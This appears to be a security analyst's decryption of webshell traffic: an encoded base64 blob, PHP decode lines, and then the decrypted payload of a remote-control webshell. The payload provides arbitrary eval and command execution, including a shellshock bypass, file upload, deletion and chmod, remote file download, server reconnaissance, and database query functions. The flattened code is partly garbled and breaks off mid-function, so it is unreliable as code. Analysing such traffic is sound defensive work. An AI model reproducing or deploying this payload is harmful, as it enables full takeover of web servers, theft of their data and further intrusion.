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";
#echo base64_decode($post);
echo "<br/>";
echo "<br/>";

$data=encode(base64_decode($post),$key);
echo $data;

解密结果如下:

$parameters=array(); $_SES=array(); function run($pms){ global $ERRMSG; reDefSystemFunc(); $_SES=&getSession(); @session_start(); $sessioId=md5(session_id()); if (isset($_SESSION[$sessioId])){ $_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId))); } @session_write_close(); if (canCallGzipDecode()==1&&@isGzipStream($pms)){ $pms=gzdecode($pms); } formatParameter($pms); if (isset($_SES["bypass_open_basedir"])&&$_SES["bypass_open_basedir"]==true){ @bypass_open_basedir(); } if (function_existsEx("set_error_handler")){ @set_error_handler("payloadErrorHandler"); } if (function_existsEx("set_exception_handler")){ @set_exception_handler("payloadExceptionHandler"); } $result=@evalFunc(); if ($result==null||$result===false){ $result=$ERRMSG; } if ($_SES!==null){ session_start(); $_SESSION[$sessioId]=base64_encode(S1MiwYYr(serialize($_SES),$sessioId)); @session_write_close(); } if (canCallGzipEncode()){ $result=gzencode($result,6); } return $result; } function payloadExceptionHandler($exception){ global $ERRMSG$ERRMSG.="ExceptionMsg:".$exception->getMessage()."\r\n"return true; } function payloadErrorHandler($errno$errstr$errfile=null, $errline=null,$errcontext=null){ global $ERRMSG$ERRMSG.="ErrLine: {$errline} ErrorMsg:{$errstr}\r\n"return true; } function S1MiwYYr($D,$K){ for($i=0;$istrlen($pms)-1){ break; } } } function evalFunc(){ @session_write_close(); $className=get("codeName"); $methodName=get("methodName"); $_SES=&getSession(); if ($methodName!=null){ if (strlen(trim($className))>0){ if ($methodName=="includeCode"){ return includeCode(); }elseif (isset($_SES[$className])){ return eval($_SES[$className]); }elsereturn "{$className} no load"; } } }elseif (function_exists($methodName)){ return $methodName(); }elsereturn "function {$methodName} not exist"; } } }elsereturn "methodName Is Null"; } } function deleteDir($p){ $m=@dir($p); while(@$f=$m->read()){ $pf=$p."/".$f; @chmod($pf,0777); if((is_dir($pf))&&($f!=".")&&($f!="..")){ deleteDir($pf); @rmdir($pf); }else if (is_file($pf)&&($f!=".")&&($f!="..")){ @unlink($pf); } } $m->close(); @chmod($p,0777); return @rmdir($p); } function deleteFile(){ $F=get("fileName"); if(is_dir($F)){ return deleteDir($F)?"ok":"fail"; }elsereturn (file_exists($F)?@unlink($F)?"ok":"fail":"fail"); } } function setFileAttr(){ $type = get("type"); $attr = get("attr"); $fileName = get("fileName"); $ret = "Null"if ($type!=null&&$attr!=null&&$fileName!=null) { if ($type=="fileBasicAttr"){ if (@chmod($fileName,convertFilePermissions($attr))){ return "ok"; }elsereturn "fail"; } }else if ($type=="fileTimeAttr"){ if (@touch($fileName,$attr)){ return "ok"; }elsereturn "fail"; } }elsereturn "no ExcuteType"; } }else$ret="type or attr or fileName is null"; } return $ret; } function fileRemoteDown(){ $url=get("url"); $saveFile=get("saveFile"); if ($url!=null&&$saveFile!=null) { $data=@file_get_contents($url); if ($data!==false){ if (@file_put_contents($saveFile,$data)!==false){ @chmod($saveFile,0777); return "ok"; }elsereturn "write fail"; } }elsereturn "read fail"; } }elsereturn "url or saveFile is null"; } } function copyFile(){ $srcFileName=get("srcFileName"); $destFileName=get("destFileName"); if (@is_file($srcFileName)){ if (copy($srcFileName,$destFileName)){ return "ok"; }elsereturn "fail"; } }elsereturn "The target does not exist or is not a file"; } } function moveFile(){ $srcFileName=get("srcFileName"); $destFileName=get("destFileName"); if (rename($srcFileName,$destFileName)){ return "ok"; }elsereturn "fail"; } } function getBasicsInfo() { $data = array(); $data['OsInfo'] = @php_uname(); $data['CurrentUser'] = @get_current_user(); $data['CurrentUser'] = strlen(trim($data['CurrentUser'])) > 0 ? $data['CurrentUser'] : 'NULL'$data['REMOTE_ADDR'] = @$_SERVER['REMOTE_ADDR']; $data['REMOTE_PORT'] = @$_SERVER['REMOTE_PORT']; $data['HTTP_X_FORWARDED_FOR'] = @$_SERVER['HTTP_X_FORWARDED_FOR']; $data['HTTP_CLIENT_IP'] = @$_SERVER['HTTP_CLIENT_IP']; $data['SERVER_ADDR'] = @$_SERVER['SERVER_ADDR']; $data['SERVER_NAME'] = @$_SERVER['SERVER_NAME']; $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT']; $data['disable_functions'] = @ini_get('disable_functions'); $data['disable_functions'] = strlen(trim($data['disable_functions'])) > 0 ? $data['disable_functions'] : @get_cfg_var('disable_functions'); $data['Open_basedir'] = @ini_get('open_basedir'); $data['timezone'] = @ini_get('date.timezone'); $data['encode'] = @ini_get('exif.encode_unicode'); $data['extension_dir'] = @ini_get('extension_dir'); $tmpDir=sys_get_temp_dir(); $separator=substr($tmpDir,strlen($tmpDir)-1,1); if ($separator!='\\'&&$separator!='/'){ $tmpDir=$tmpDir.'/'; } $data['systempdir'] = $tmpDir$data['include_path'] = @ini_get('include_path'); $data['DOCUMENT_ROOT'] = $_SERVER['DOCUMENT_ROOT']; $data['PHP_SAPI'] = PHP_SAPI; $data['PHP_VERSION'] = PHP_VERSION; $data['PHP_INT_SIZE'] = PHP_INT_SIZE; $data['ProcessArch'] = PHP_INT_SIZE==8?"x64":"x86"$data['PHP_OS'] = PHP_OS; $data['canCallGzipDecode'] = canCallGzipDecode(); $data['canCallGzipEncode'] = canCallGzipEncode(); $data['session_name'] = @ini_get("session.name"); $data['session_save_path'] = @ini_get("session.save_path"); $data['session_save_handler'] = @ini_get("session.save_handler"); $data['session_serialize_handler'] = @ini_get("session.serialize_handler"); $data['user_ini_filename'] = @ini_get("user_ini.filename"); $data['memory_limit'] = @ini_get('memory_limit'); $data['upload_max_filesize'] = @ini_get('upload_max_filesize'); $data['post_max_size'] = @ini_get('post_max_size'); $data['max_execution_time'] = @ini_get('max_execution_time'); $data['max_input_time'] = @ini_get('max_input_time'); $data['default_socket_timeout'] = @ini_get('default_socket_timeout'); $data['mygid'] = @getmygid(); $data['mypid'] = @getmypid(); $data['SERVER_SOFTWAREypid'] = @$_SERVER['SERVER_SOFTWARE']; $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT']; $data['loaded_extensions'] = @implode(',', @get_loaded_extensions()); $data['short_open_tag'] = @get_cfg_var('short_open_tag'); $data['short_open_tag'] = @(int)$data['short_open_tag'] == 1 ? 'true' : 'false'$data['asp_tags'] = @get_cfg_var('asp_tags'); $data['asp_tags'] = (int)$data['asp_tags'] == 1 ? 'true' : 'false'$data['safe_mode'] = @get_cfg_var('safe_mode'); $data['safe_mode'] = (int)$data['safe_mode'] == 1 ? 'true' : 'false'$data['CurrentDir'] = str_replace('\\''/', @dirname($_SERVER['SCRIPT_FILENAME'])); if (strlen(trim($data['CurrentDir']))==0){ $data['CurrentDir'] = str_replace('\\''/', @dirname(__FILE__)); } $SCRIPT_FILENAME=@dirname(__FILE__); $data['FileRoot'] = ''if (substr($SCRIPT_FILENAME01) != '/') { $drivers=array('C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'); foreach ($drivers as $L){ if (@is_dir("{$L}:/")){ $data['FileRoot'] .= "{$L}:/;";} } if (empty($data['FileRoot'])){ $data['FileRoot']=substr($SCRIPT_FILENAME,0,3); } }else$data['FileRoot'] .= "/"; } $result=""foreach($data as $key=>$value){ $result.=$key." : ".$value."\n"; } return $result; } function getFile(){ $dir=get('dirName'); $dir=(strlen(@trim($dir))>0)?trim($dir):str_replace('\\','/',dirname(__FILE__)); $dir.="/"$path=$dir$allFiles = @scandir($path); $data=""if ($allFiles!=null){ $data.="ok"$data.="\n"$data.=$path$data.="\n"foreach ($allFiles as $fileName) { if ($fileName!="."&&$fileName!=".."){ $fullPath = $path.$fileName$lineData=array(); array_push($lineData,$fileName); array_push($lineData,@is_file($fullPath)?"1":"0"); array_push($lineData,date("Y-m-d H:i:s", @filemtime($fullPath))); array_push($lineData,@filesize($fullPath)); $fr=(@is_readable($fullPath)?"R":"").(@is_writable($fullPath)?"W":"").(@is_executable($fullPath)?"X":""); array_push($lineData,(strlen($fr)>0?$fr:"F")); $data.=(implode("\t",$lineData)."\n"); } } }elsereturn "Path Not Found Or No Permission!"; } return $data; } function readFileContent(){ $fileName=get("fileName"); if (@is_file($fileName)){ if (function_existsEx("is_readable")){ return file_get_contents($fileName); }elsereturn "No Permission!"; } }elsereturn "File Not Found"; } } function uploadFile(){ $fileName=get("fileName"); $fileValue=get("fileValue"); if (@file_put_contents($fileName,$fileValue)!==false){ @chmod($fileName,0777); return "ok"; }elsereturn "fail"; } } function newDir(){ $dir=get("dirName"); if (@mkdir($dir,0777,true)!==false){ return "ok"; }elsereturn "fail"; } } function newFile(){ $fileName=get("fileName"); if (@file_put_contents($fileName,"")!==false){ return "ok"; }elsereturn "fail"; } } function function_existsEx($functionName){ $d=explode(",",@ini_get("disable_functions")); if(empty($d)){ $d=array(); }else$d=array_map('trim',array_map('strtolower',$d)); } return(function_exists($functionName)&&is_callable($functionName)&&!in_array($functionName,$d)); } function execCommand(){ @ob_start(); $cmdLine=get("cmdLine"); if(substr(__FILE__,0,1)=="/"){ @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); }else{ @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } $result=""if (!function_existsEx("runshellshock")){ function runshellshock($d$c) { if (substr($d01) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (function_existsEx('error_log')) { error_log("a"1); } else { mail("[email protected]""""""-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { return $output; } } return False; }; } if(function_existsEx('system')){ @system($cmdLine,$ret); }elseif(function_existsEx('passthru')){ $result=@passthru($cmdLine,$ret); }elseif(function_existsEx('shell_exec')){ $result=@shell_exec($cmdLine); }elseif(function_existsEx('exec')){ @exec($cmdLine,$o,$ret); $result=join("\n",$o); }elseif(function_existsEx('popen')){ $fp=@popen($cmdLine,'r'); while(!@feof($fp)){ $result.=@fgets($fp,1024*1024); } @pclose($fp); }elseif(function_existsEx('proc_open')){ $p = @proc_open($cmdLine, array(1 => array('pipe''w'), 2 => array('pipe''w')), $io); while(!@feof($io[1])){ $result.=@fgets($io[1],1024*1024); } while(!@feof($io[2])){ $result.=@fgets($io[2],1024*1024); } @fclose($io[1]); @fclose($io[2]); @proc_close($p); }elseif(substr(__FILE__,0,1)!="/" && @class_exists("COM")){ $w=new COM('WScript.shell'); $e=$w->exec($cmdLine); $so=$e->StdOut(); $result.=$so->ReadAll(); $se=$e->StdErr(); $result.=$se->ReadAll(); }elseif (function_existsEx("pcntl_fork")&&function_existsEx("pcntl_exec")){ $cmd="/bin/bash"if (!file_exists($cmd)){ $cmd="/bin/sh"; } $commandFile=sys_get_temp_dir()."/".time().".log"$resultFile=sys_get_temp_dir()."/".(time()+1).".log"; @file_put_contents($commandFile,$cmdLine); switch (pcntl_fork()) { case 0$args = array("-c""$cmdLine > $resultFile"); pcntl_exec($cmd$args); // the child will only reach this point on exec failure, // because execution shifts to the pcntl_exec()ed command exit(0); default: break; } if (!file_exists($resultFile)){ sleep(2); } $result=file_get_contents($resultFile); @unlink($commandFile); @unlink($resultFile); }elseif(($result=runshellshock(__FILE__, $cmdLine)!==false)) { }elsereturn "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock/pcntl_exec is available"; } $result .= @ob_get_contents(); @ob_end_clean(); return $result; } function execSql(){ $dbType=get("dbType"); $dbHost=get("dbHost"); $dbPort=get("dbPort"); $username=get("dbUsername"); $password=get("dbPassword"); $execType=get("execType"); $execSql=get("execSql"); $charset=get("dbCharset"); $currentDb=get("currentDb"); function mysqli_exec($host,$port,$username,$password,$execType,$currentDb,$sql,$charset){ // 创建连接 $conn = new mysqli($host,$username,$password,"",$port); // Check connection if ($conn->connect_error) { return $conn->connect_error; } if (!empty($charset)){ $conn->set_charset($charset); } if (!empty($currentDb)){ $conn->select_db($currentDb); } $result = $conn->query($sql); if ($conn->error){ return $conn->error; } if ($execType=="update"){ return "Query OK, ".$conn->affected_rows." rows affected"; }else$data="ok\n"while ($column = $result->fetch_field()){ $data.=base64_encode($column->name)."\t"; } $data.="\n"if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { foreach ($row as $value){ $data.=base64_encode($value)."\t"; } $data.="\n"; } } return $data; } } function mysql_exec($host$port$username$password$execType$currentDb,$sql,$charset) { $con = @mysql_connect($host.":".$port$username$password); if (!$con) { return mysql_error(); } else { if (!empty($charset)){ mysql_set_charset($charset,$con); } if (!empty($currentDb)){ if (function_existsEx("mysql_selectdb")){ mysql_selectdb($currentDb,$con); }elseif (function_existsEx("mysql_select_db")){ mysql_select_db($currentDb,$con); } } $result = @mysql_query($sql); if (!$result) { return mysql_error(); } if ($execType == "update") { return "Query OK, ".mysql_affected_rows($con)." rows affected"; } else { $data = "ok\n"for ($i = 0$i < mysql_num_fields($result); $i++) { $data.= base64_encode(mysql_field_name($result$i))."\t"; } $data.= "\n"$rowNum = mysql_num_rows($result); if ($rowNum > 0) { while ($row = mysql_fetch_row($result)) { foreach($row as $value) { $data.= base64_encode($value)."\t"; } $data.= "\n"; } } } @mysql_close($con); return $data; } } function mysqliEx_exec($host$port$username$password$execType$currentDb,$sql,$charset){ $port == "" ? $port = "3306" : $port$T=@mysqli_connect($host,$username,$password,"",$port); if (!empty($charset)){ @mysqli_set_charset($charset); } if (!empty($currentDb)){ @mysqli_select_db($T,$currentDb); } $q=@mysqli_query($T,$sql); if(is_bool($q)){ return mysqli_error($T); }elseif (mysqli_num_fields($q)>0){ $i=0$data = "ok\n"while($col=@mysqli_fetch_field($q)){ $data.=base64_encode($col->name)."\t"$i++; } $data.="\n"while($rs=@mysqli_fetch_row($q)){ for($c=0;$c<$i;$c++){ $data.=base64_encode(trim($rs[$c]))."\t"; } $data.="\n"; } return $data; }elsereturn "Query OK, ".@mysqli_affected_rows($T)." rows affected"; } } } function pg_execEx($host$port$username$password$execType,$currentDb$sql,$charset){ $port == "" ? $port = "5432" : $port$arr=array( 'host'=>$host'port'=>$port'user'=>$username'password'=>$password ); if (!empty($currentDb)){ $arr["dbname"]=$currentDb; } $cs=''foreach($arr as $k=>$v) { if(empty($v)){ continue; } $cs .= "$k=$v "; } $T=@pg_connect($cs); if(!$T){ return @pg_last_error(); }elseif (!empty($charset)){ 